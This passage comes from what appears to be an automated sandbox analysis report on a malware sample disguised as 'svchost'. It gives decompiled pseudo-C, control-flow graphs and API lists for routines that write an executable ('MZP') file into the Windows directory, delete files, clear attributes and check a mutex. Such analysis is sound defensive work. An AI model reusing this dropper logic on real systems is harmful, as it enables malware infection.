                                                                          0x004017ec
                                                                          0x004017ee
                                                                          0x004017f3
                                                                          0x004017f3
                                                                          0x004017fb
                                                                          0x004017ff
                                                                          0x00401800
                                                                          0x0040180c
                                                                          0x0040180f
                                                                          0x00401811
                                                                          0x00401816
                                                                          0x00401816
                                                                          0x0040181f
                                                                          0x00401822
                                                                          0x00401825
                                                                          0x00401831
                                                                          0x00401833
                                                                          0x00401838
                                                                          0x00000000
                                                                          0x00401838
                                                                          0x0040183d

                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID: `W
                                                                          • API String ID: 730355536-2472242476
                                                                          • Opcode ID: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                          • Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
                                                                          • Opcode Fuzzy Hash: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                          • Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401E74, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 314 401e74-401e86 315 401e91-401e97 314->315 316 401e88 call 401788 314->316 318 401ea3-401eb8 315->318 319 401e99-401e9e 315->319 323 401e8d-401e8f 316->323 321 401ec4-401ecd 318->321 322 401eba-401ebf RtlEnterCriticalSection 318->322 320 401ff7-402000 319->320 324 401ed4-401eda 321->324 325 401ecf 321->325 322->321 323->315 323->319 326 401ee0-401ee4 324->326 327 401f73-401f79 324->327 325->324 330 401ee6 326->330 331 401ee9-401ef8 326->331 328 401fc5-401fc7 call 401d80 327->328 329 401f7b-401f88 327->329 339 401fcc-401fe3 328->339 332 401f97-401fc3 call 402bec 329->332 333 401f8a-401f92 329->333 330->331 331->327 334 401efa-401f08 331->334 332->320 333->332 337 401f24-401f28 334->337 338 401f0a-401f0e 334->338 344 401f2a 337->344 345 401f2d-401f48 337->345 341 401f10 338->341 342 401f13-401f22 338->342 347 401fe5-401fea RtlLeaveCriticalSection 339->347 348 401fef 339->348 341->342 346 401f4a-401f6e call 402bec 342->346 344->345 345->346 346->320 347->348
                                                                          APIs
                                                                            • Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                            • Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                            • Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                            • Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0216C7FC,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID: `W
                                                                          • API String ID: 2227675388-2472242476
                                                                          • Opcode ID: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                          • Instruction ID: c8d1828e50afdd1ef66478082c2fc5af823077db28515af4f228c2db3bc24797
                                                                          • Opcode Fuzzy Hash: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                          • Instruction Fuzzy Hash: 8A419BB2A043029FD714CF69DE81A2AB7B0FB59318B18827FD441E72F1D739A8518A49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406B48, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 351 406b48-406b72 352 406b74-406b7c 351->352 353 406bbc-406be9 call 405968 call 403b24 351->353 355 406b7f-406b85 352->355 367 406c26-406c36 call 403970 call 406638 353->367 368 406beb-406bf3 353->368 357 406c7b-406c96 call 403b30 355->357 358 406b8b-406b94 355->358 361 406bb3-406bba 358->361 362 406b96-406b9a 358->362 361->353 361->355 365 406b9d-406ba7 362->365 365->357 366 406bad-406bb1 365->366 366->361 366->365 374 406c3b-406c3d 367->374 370 406bf6-406c24 GetIconInfo 368->370 370->367 370->370 375 406c4c-406c58 call 403970 374->375 376 406c3f-406c47 call 405990 374->376 375->357 380 406c5a-406c5b 375->380 376->375 381 406c62-406c6d 380->381 382 406c75-406c79 381->382 383 406c6f-406c70 DeleteObject 381->383 382->357 382->381 383->382
                                                                          C-Code - Quality: 89%
                                                                          			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				struct _ICONINFO _v48;
				void* _t65;
				void* _t72;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t98;
				void* _t99;
				intOrPtr _t103;
				intOrPtr _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t124;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t124);
				_push(0x406c97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124 + 0xffffffd4;
				_t116 = _v12;
				if(_t116 < 0) {
					L8:
					_v24 = E00405968();
					_push(_v12 + 1 + _v12 + 1);
					E00403B24();
					_t117 = _v12;
					if(_t117 >= 0) {
						_t120 = _t117 + 1;
						_v20 = 0;
						_t85 = _v8;
						do {
							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
							_t81 = _v20 + _v20;
							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
							_v20 = _v20 + 1;
							_t85 = _t85 + 4;
							_t120 = _t120 - 1;
						} while (_t120 != 0);
					}
					_t65 = E00406638(_v28, _v16, E00403970()); // executed
					if(_t65 == 0) {
						E00405990(_v16);
					}
					_t118 = E00403970();
					if(_t118 >= 0) {
						_t119 = _t118 + 1;
						_v20 = 0;
						do {
							_t72 =  *(_v28 + _v20 * 4);
							if(_t72 != 0) {
								DeleteObject(_t72);
							}
							_v20 = _v20 + 1;
							_t119 = _t119 - 1;
						} while (_t119 != 0);
					}
				} else {
					_t121 = _t116 + 1;
					_v20 = 0;
					_t82 = _v8;
					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
						_t111 = _v20 + 1;
						_t98 = _v12 - _t111;
						if(_t98 < 0) {
							L7:
							_v20 = _v20 + 1;
							_t82 = _t82 + 4;
							_t121 = _t121 - 1;
							if(_t121 != 0) {
								continue;
							} else {
								goto L8;
							}
						} else {
							_t99 = _t98 + 1;
							_t112 = _v8 + _t111 * 4;
							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
								_t112 = _t112 + 4;
								_t99 = _t99 - 1;
								if(_t99 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L18;
							}
						}
						goto L18;
					}
				}
				L18:
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00406C9E);
				_t104 =  *0x406b28; // 0x406b2c
				return E00403B30( &_v28, _t104);
			}




























                                                                          0x00406b53
                                                                          0x00406b56
                                                                          0x00406b59
                                                                          0x00406b5c
                                                                          0x00406b61
                                                                          0x00406b62
                                                                          0x00406b67
                                                                          0x00406b6a
                                                                          0x00406b6d
                                                                          0x00406b72
                                                                          0x00406bbc
                                                                          0x00406bc4
                                                                          0x00406bcd
                                                                          0x00406bdc
                                                                          0x00406be4
                                                                          0x00406be9
                                                                          0x00406beb
                                                                          0x00406bec
                                                                          0x00406bf3
                                                                          0x00406bf6
                                                                          0x00406c00
                                                                          0x00406c08
                                                                          0x00406c10
                                                                          0x00406c19
                                                                          0x00406c1d
                                                                          0x00406c20
                                                                          0x00406c23
                                                                          0x00406c23
                                                                          0x00406bf6
                                                                          0x00406c36
                                                                          0x00406c3d
                                                                          0x00406c47
                                                                          0x00406c47
                                                                          0x00406c54
                                                                          0x00406c58
                                                                          0x00406c5a
                                                                          0x00406c5b
                                                                          0x00406c62
                                                                          0x00406c68
                                                                          0x00406c6d
                                                                          0x00406c70
                                                                          0x00406c70
                                                                          0x00406c75
                                                                          0x00406c78
                                                                          0x00406c78
                                                                          0x00406c62
                                                                          0x00406b74
                                                                          0x00406b74
                                                                          0x00406b75
                                                                          0x00406b7c
                                                                          0x00406b7f
                                                                          0x00406b8e
                                                                          0x00406b92
                                                                          0x00406b94
                                                                          0x00406bb3
                                                                          0x00406bb3
                                                                          0x00406bb6
                                                                          0x00406bb9
                                                                          0x00406bba
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406b96
                                                                          0x00406b96
                                                                          0x00406b9a
                                                                          0x00406b9d
                                                                          0x00406bad
                                                                          0x00406bb0
                                                                          0x00406bb1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406bb1
                                                                          0x00406b9d
                                                                          0x00000000
                                                                          0x00406b94
                                                                          0x00406b7f
                                                                          0x00406c7b
                                                                          0x00406c7d
                                                                          0x00406c80
                                                                          0x00406c83
                                                                          0x00406c8b
                                                                          0x00406c96

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteIconInfoObject
                                                                          • String ID: ,k@
                                                                          • API String ID: 2689914137-1053005162
                                                                          • Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                          • Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
                                                                          • Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                          • Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004079A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 51%
                                                                          			E004079A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t31;
				void* _t59;
				intOrPtr _t73;
				void* _t82;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t82 = __edi;
				_t54 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(_t86);
				_push(0x407ac4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				E00407080(0x4091e0, 0xb, 0xb);
				E004031F4( &_v12, 0xb, 0x4091e0);
				_push(_v12);
				E00404F90( &_v16, __ebx, 0xb);
				_pop(_t59);
				E00403258( &_v8, _t59, _v16);
				if(E00404B9C() != 0) {
					DeleteFileA(E0040340C(_v8)); // executed
				}
				_t31 = E00404BF8(E0040340C(_v8), _t54, 0xa200, 0x40a698, _t82, _t83); // executed
				if(_t31 != 0) {
					E00407080(0x4091ec, 0x1a, 0x1a);
					E004031F4( &_v20, 0x1a, 0x4091ec);
					_t55 = E0040575C(0x80000000, 0x1a, _v20);
					E00407080(0x409208, 8, 8);
					E004031F4( &_v28, 8, 0x409208);
					E00403258( &_v24, _v28, _v8);
					E0040578C(_t40, _v24, 0);
					E004057CC(_t55);
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E00407ACB);
				return E004030B8( &_v28, 6);
			}















                                                                          0x004079a0
                                                                          0x004079a0
                                                                          0x004079a0
                                                                          0x004079a5
                                                                          0x004079a6
                                                                          0x004079a7
                                                                          0x004079a8
                                                                          0x004079a9
                                                                          0x004079aa
                                                                          0x004079ab
                                                                          0x004079ae
                                                                          0x004079af
                                                                          0x004079b4
                                                                          0x004079b7
                                                                          0x004079c9
                                                                          0x004079db
                                                                          0x004079e3
                                                                          0x004079e7
                                                                          0x004079f2
                                                                          0x004079f3
                                                                          0x00407a02
                                                                          0x00407a0d
                                                                          0x00407a0d
                                                                          0x00407a24
                                                                          0x00407a2b
                                                                          0x00407a3c
                                                                          0x00407a4e
                                                                          0x00407a60
                                                                          0x00407a71
                                                                          0x00407a83
                                                                          0x00407a91
                                                                          0x00407a9d
                                                                          0x00407aa4
                                                                          0x00407aa4
                                                                          0x00407aab
                                                                          0x00407aae
                                                                          0x00407ab1
                                                                          0x00407ac3

                                                                          APIs
                                                                            • Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407EB6,00000000,00408020,?,?,00000000,00000000,?,0040819C), ref: 00404FBE
                                                                            • Part of subcall function 00404B9C: GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 00407A0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$AttributesDeleteDirectoryWindows
                                                                          • String ID: MZP
                                                                          • API String ID: 3550186980-2889622443
                                                                          • Opcode ID: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                          • Instruction ID: 69b580403c23d9cc841dfa7c227de2d2e2536c961132663fd28ad6461d03daee
                                                                          • Opcode Fuzzy Hash: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                          • Instruction Fuzzy Hash: 91212F70B04109ABDB04FAA5C85279F7B69EB85304F50847EA501BB3C2DF3CEE05976A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404BC4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 452 404bc4-404bd7 ReadFile 453 404bd9 452->453 454 404bdb-404bdc 452->454 453->454
                                                                          C-Code - Quality: 100%
                                                                          			E00404BC4(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				DWORD* _t8;

				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
				_t3 = 0;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}






                                                                          0x00404bcf
                                                                          0x00404bd6
                                                                          0x00404bd7
                                                                          0x00000000
                                                                          0x00404bd9
                                                                          0x00404bdc

                                                                          APIs
                                                                          • ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: MZP
                                                                          • API String ID: 2738559852-2889622443
                                                                          • Opcode ID: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                          • Instruction ID: 3ae4d4c2ce5489376b9a0e409b07906e0c93d400668ceedc4e43a286d92feaa2
                                                                          • Opcode Fuzzy Hash: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                          • Instruction Fuzzy Hash: DEC04CA12582083AF51061A29C16F23355CC781799F12456AB704E51D1F096F81000A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404BE0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 455 404be0-404bf2 WriteFile 456 404bf4 455->456 457 404bf6-404bf7 455->457 456->457
                                                                          C-Code - Quality: 100%
                                                                          			E00404BE0(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				void* _t7;
				DWORD* _t9;

				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
				_t3 = _t7;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}







                                                                          0x00404bea
                                                                          0x00404bf1
                                                                          0x00404bf2
                                                                          0x00000000
                                                                          0x00404bf4
                                                                          0x00404bf7

                                                                          APIs
                                                                          • WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID: MZP
                                                                          • API String ID: 3934441357-2889622443
                                                                          • Opcode ID: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                          • Instruction ID: cd8d274a544879f86d75f83ceab2a9824fbef203ff2d66308718860d554d7d3d
                                                                          • Opcode Fuzzy Hash: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                          • Instruction Fuzzy Hash: 4EC04CA11582083AF51051A7AC06F233A5CC781698F114436BB08E1581F456F8011079
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407BD4, Relevance: 3.1, APIs: 2, Instructions: 114COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 72%
                                                                          			E00407BD4(void* __eax, void* __ebx, void* __esi) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				char _v40258;
				char _v41492;
				char _v41496;
				void* _t35;
				void* _t53;
				void* _t58;
				CHAR* _t88;
				intOrPtr _t101;
				intOrPtr _t111;
				void* _t114;
				void* _t115;
				intOrPtr _t116;

				_t87 = __ebx;
				_t114 = _t115;
				_push(__eax);
				_t35 = 0xa;
				do {
					_t115 = _t115 + 0xfffff004;
					_push(_t35);
					_t35 = _t35 - 1;
					_t117 = _t35;
				} while (_t35 != 0);
				_t116 = _t115 + 0xfffffdf0;
				_push(__ebx);
				_v41496 = 0;
				E004033FC(_v8);
				_push(_t114);
				_push(0x407d8d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116;
				E004031F4( &_v41496, 3, 0x4091c0);
				_t100 = _v41496;
				if(E00406FE4(_v8, __ebx, _v41496, _t117) == 0) {
					L10:
					__eflags = 0;
					_pop(_t101);
					 *[fs:eax] = _t101;
					_push(E00407D94);
					E00403094( &_v41496);
					return E00403094( &_v8);
				} else {
					_t53 = E0040258C( *_v8) + 0xbf - 2;
					if(_t53 < 0) {
						goto L10;
					} else {
						_t120 = _t53 == 0x19;
						if(_t53 == 0x19) {
							goto L10;
						} else {
							E00407AD0(_v8, _t87, __esi, _t120); // executed
							_t58 = E00407130(_v8, _t87); // executed
							if(_t58 == 0) {
								goto L10;
							} else {
								_t88 = E0040340C(_v8);
								_v12 = GetFileAttributesA(_t88);
								_t122 = _v12 & 0x00000001;
								if((_v12 & 0x00000001) > 0) {
									SetFileAttributesA(_t88, 0);
								}
								_v16 = E00405B84(_v8, _t100, _t122);
								_push(_t114);
								_push(0x407d4a);
								_push( *[fs:eax]);
								 *[fs:eax] = _t116;
								E0040597C(_v16);
								E00405974();
								E00405988(_v16);
								E0040254C( &_v40258, 4,  &_v20);
								E00407080( &_v41492, _v20, 0x3e8);
								E00405974();
								E0040598C(_v16);
								E0040597C(_v16);
								E00405980(_v16);
								_pop(_t111);
								 *[fs:eax] = _t111;
								_push(E00407D51);
								return E00404520(_v16);
							}
						}
					}
				}
			}



















                                                                          0x00407bd4
                                                                          0x00407bd5
                                                                          0x00407bd7
                                                                          0x00407bd8
                                                                          0x00407bdd
                                                                          0x00407bdd
                                                                          0x00407be3
                                                                          0x00407be4
                                                                          0x00407be4
                                                                          0x00407be4
                                                                          0x00407bea
                                                                          0x00407bf0
                                                                          0x00407bf3
                                                                          0x00407bff
                                                                          0x00407c06
                                                                          0x00407c07
                                                                          0x00407c0c
                                                                          0x00407c0f
                                                                          0x00407c22
                                                                          0x00407c27
                                                                          0x00407c37
                                                                          0x00407d6c
                                                                          0x00407d6c
                                                                          0x00407d6e
                                                                          0x00407d71
                                                                          0x00407d74
                                                                          0x00407d7f
                                                                          0x00407d8c
                                                                          0x00407c3d
                                                                          0x00407c49
                                                                          0x00407c4b
                                                                          0x00000000
                                                                          0x00407c51
                                                                          0x00407c51
                                                                          0x00407c53
                                                                          0x00000000
                                                                          0x00407c59
                                                                          0x00407c5c
                                                                          0x00407c64
                                                                          0x00407c6b
                                                                          0x00000000
                                                                          0x00407c71
                                                                          0x00407c79
                                                                          0x00407c81
                                                                          0x00407c84
                                                                          0x00407c8b
                                                                          0x00407c90
                                                                          0x00407c90
                                                                          0x00407c9d
                                                                          0x00407ca2
                                                                          0x00407ca3
                                                                          0x00407ca8
                                                                          0x00407cab
                                                                          0x00407cb1
                                                                          0x00407cc1
                                                                          0x00407cd4
                                                                          0x00407ce7
                                                                          0x00407cfa
                                                                          0x00407d04
                                                                          0x00407d17
                                                                          0x00407d1f
                                                                          0x00407d2f
                                                                          0x00407d36
                                                                          0x00407d39
                                                                          0x00407d3c
                                                                          0x00407d49
                                                                          0x00407d49
                                                                          0x00407c6b
                                                                          0x00407c53
                                                                          0x00407c4b

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00407D8D), ref: 00407C7C
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 00407C90
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: b5eb93d17ee822dbc2cfe60c370f870a49ec75f8fbc2fd949dadd44c38c3286c
                                                                          • Instruction ID: 984d91ffacc30f0f747519396fe1a4ca6018efb205f81ccdb5163335beaf5ee0
                                                                          • Opcode Fuzzy Hash: b5eb93d17ee822dbc2cfe60c370f870a49ec75f8fbc2fd949dadd44c38c3286c
                                                                          • Instruction Fuzzy Hash: C6417170E046089FDB10EB69CD929AEB7B5EF45304F1044B7F414B73D2DA39AE058E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040759C, Relevance: 3.1, APIs: 2, Instructions: 62synchronizationCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 61%
                                                                          			E0040759C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void* _t11;
				void* _t17;
				void* _t32;
				intOrPtr _t38;
				void* _t44;
				void* _t46;
				intOrPtr _t49;

				_t56 = __fp0;
				_t45 = __esi;
				_t48 = _t49;
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t49);
				_push(0x40765c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49; // executed
				_t11 = E00406E94(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
				if(_t11 != 0) {
					_t40 = 0x14;
					E00407080(0x4091c8, 0x14, 0x14);
					_t17 = E00404018(0, 0, 0x4091c8); // executed
					_t44 = _t17;
					if(GetLastError() != 0xb7) {
						E00406D40( &_v8, __ebx, _t44, __esi); // executed
						_t32 = E0040320C(_v8);
						_t53 = _t32;
						if(_t32 > 0) {
							_t46 = 1;
							do {
								E004031B4();
								_t40 = 0x407674;
								E00403214( &_v12, 0x407674);
								E004074B4(_v12, _t32, _t44, _t46, _t53, _t48); // executed
								_pop(0x14);
								_t46 = _t46 + 1;
								_t32 = _t32 - 1;
								_t54 = _t32;
							} while (_t32 != 0);
						}
						E00406E0C(_t32, 0x14, _t40, _t44, _t45, _t54, _t56);
						ReleaseMutex(_t44);
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E00407663);
				return E004030B8( &_v12, 2);
			}












                                                                          0x0040759c
                                                                          0x0040759c
                                                                          0x0040759d
                                                                          0x0040759f
                                                                          0x004075a1
                                                                          0x004075a3
                                                                          0x004075a4
                                                                          0x004075a5
                                                                          0x004075a8
                                                                          0x004075a9
                                                                          0x004075ae
                                                                          0x004075b1
                                                                          0x004075b4
                                                                          0x004075bb
                                                                          0x004075cb
